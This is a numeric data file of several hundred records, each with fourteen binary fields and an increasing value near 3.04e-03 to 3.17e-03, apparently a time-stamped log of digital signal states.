1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0375920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0376160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0376440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0376680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0376920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0377160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0377400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0377640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0377920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0378160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0378440e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0378920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0379160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0379240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0379400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0379640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0379920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0380160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0380440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0380680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0380920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0381160e-03 1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.0381200e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0381240e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0381640e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0381920e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.0381960e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0382000e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0382160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0382440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0382680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0382920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0383160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0383400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0383640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0383920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0383960e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0384440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0384680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0384760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0384920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0385160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0385400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0385640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0385920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0386160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0386440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0386680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0386920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0387160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0387400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0387640e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0387720e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0388160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0388440e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.0388480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0388520e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0388680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0388920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0389160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0389400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0389640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0389920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0389960e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0390440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0390680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0390760e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0390920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0391160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0391400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0391640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0391920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0392160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0392440e-03 1,1,1,0,0,0,0,0,0,1,0,0,0,0,3.0392680e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0392720e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0393160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0393400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0393480e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0393640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0393920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0393960e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0394440e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0394680e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0394920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0395160e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0395400e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0395640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0395720e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0396160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0396440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0396680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0396920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0397160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0397400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0397640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0397920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0398160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0398440e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0398680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0398920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0399160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0399400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0399640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0399920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0400160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0400440e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0400920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0401160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0401240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0401400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0401640e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0401720e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0402160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0402440e-03 1,1,1,0,0,1,0,0,0,0,0,0,0,0,3.0402480e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0402520e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0402680e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0402920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0403160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0403400e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0403640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0403920e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0404160e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0404440e-03 1,1,1,0,0,1,0,0,0,1,0,0,1,0,3.0404920e-03 1,1,1,0,0,1,0,0,0,1,0,0,0,0,3.0405160e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0405240e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0405400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0405640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0405920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0406160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0406440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0406680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0406920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0407160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0407400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0407640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0407920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0408160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0408440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0408680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0408920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0409160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0409400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0409640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0409920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0410160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0410440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0410680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0410920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0411160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0411400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0411640e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0411920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0412160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0412440e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0412680e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0412920e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0413160e-03 1,1,1,0,0,0,0,0,0,0,0,0,1,0,3.0413400e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,0,3.0413640e-03 1,1,1,0,0,0,0,0,0,0,0,0,0,1,3.1657000e-03 0,0,0,0,0,0,0,0,0,0,0,0,0,1,3.1658600e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1658840e-03 0,0,0,1,0,0,0,0,0,0,0,1,0,1,3.1659120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1659360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.1662680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1662920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.1663160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1663400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.1663640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1663920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.1664160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1664440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,1,3.1664680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.1664920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,1,3.1664960e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1665320e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1665400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1665640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1665720e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1665920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1666160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1666680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1666920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1667160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1667400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1667640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1667920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1668160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1668440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1668680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1668920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1668960e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1669400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1669640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1669720e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1669920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1670120e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1670200e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1670640e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1670920e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.1670960e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1671000e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1671160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1671400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1671640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1671880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1672120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1672360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1672640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1672880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1673400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1673640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1673880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1674120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1674640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1674920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1675160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1675400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1675640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1675880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1676120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1676360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1676640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1676880e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1676920e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1677400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1677640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1677720e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1677880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1678120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1678360e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1678640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1678920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1679160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1679400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1679640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1679880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1680120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1680400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1680680e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1680920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1681160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1681400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1681640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1681880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1682120e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1682200e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1682680e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1682920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1683000e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1683160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1683400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1683640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1683880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1684120e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1684440e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1684920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1685160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1685240e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1685400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1685640e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1685720e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1685920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1686120e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1686440e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1686680e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1686920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1687160e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1687400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1687640e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1688200e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1688440e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1688680e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1688920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1689000e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1689160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1689400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1689920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1690160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1690440e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1690680e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1690920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1691160e-03 0,0,0,1,0,0,0,0,0,1,0,0,0,0,3.1691200e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1691240e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1691400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1691640e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1691920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1692160e-03 0,0,0,1,0,1,0,0,0,0,0,0,0,0,3.1692200e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1692240e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1692680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1692920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1693160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1693400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1693640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1693920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1694160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1694440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1694680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1694920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1695160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1695400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1695640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1695920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1696160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1696440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1696680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1696920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1696960e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1697400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1697640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1697720e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1698200e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1698440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1698680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1698920e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1699160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1699400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1699640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1699920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1699960e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1700440e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1700680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1700760e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1700920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1701160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1701400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1701640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1701920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1702120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1702440e-03 0,0,0,1,0,0,0,0,0,1,0,0,0,0,3.1702680e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1702720e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1703160e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1703400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1703480e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1703640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1703880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1704120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1704440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1704680e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1704880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1705160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1705400e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1705640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1705880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1706120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1706360e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1706440e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1706920e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1707160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1707240e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1707400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1707640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1707880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1708120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1708400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1708640e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1708680e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1709160e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1709400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1709480e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1709640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1709880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1710120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1710360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1710640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1710880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1711160e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1711400e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1711440e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1711880e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1712120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1712200e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1712400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1712640e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1712680e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1713120e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1713400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1713440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1713640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1713880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1714120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1714360e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1714440e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1714640e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1714840e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1714960e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1715400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1715640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1715880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1716120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1716360e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1716640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1717120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1717360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1717640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1717880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1718120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1718360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1718640e-03 